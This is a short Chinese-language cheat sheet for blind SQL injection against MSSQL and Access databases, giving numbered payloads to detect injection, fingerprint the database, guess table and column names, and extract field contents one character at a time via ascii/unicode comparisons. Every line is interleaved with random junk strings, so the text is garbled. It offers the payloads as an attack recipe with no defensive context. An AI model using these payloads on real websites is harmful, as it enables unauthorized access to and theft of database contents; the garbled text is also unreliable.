1.判断是否有注入;and 1=1 ;and 1=2 bl:a&<F
2.初步判断是否是mssql ;and user>0 -)y> c
M(.uu`B
3.注入参数是字符'and [查询条件] and ''=' N27K
m+72C]9
4.搜索时没过滤参数的'and [查询条件] and '%25'=' #K<=xP
h8iaJqqvJ
5.判断数据库系统 C;58z5*,
0,vj,ic*WX
;and (select count(*) from sysobjects)>0 mssql I&'S2=s
)M&Azbu
;and (select count(*) from msysobjects)>0 access DU*g~{8T$
nU?Xc(Xy
{Gk}3u/
8^P2GG'+-
6.猜数据库 ;and (select Count(*) from [数据库名])>0 8r`VbgI&
*hk{q/*Qw
7.猜字段 ;and (select Count(字段名) from 数据库名)>0 c"%_]7
0M/\bEG(_
8.猜字段中记录长度 ;and (select top 1 len(字段名) from 数据库名)>0 ~L\( /[
JhMrm%
9.(1)猜字段的ascii值(access) ySr091Q
^V XXq
;and (select top 1 asc(mid(字段名,1,1)) from 数据库名)>0 y7;XOPm
J#Ne:Aj_
(2)猜字段的ascii值(mssql) IxEQh)J X
}Yo15BN+
;and (select top 1 unicode(substring(字段名,1,1)) from 数据库名)>0 o3TBRn,
43}&w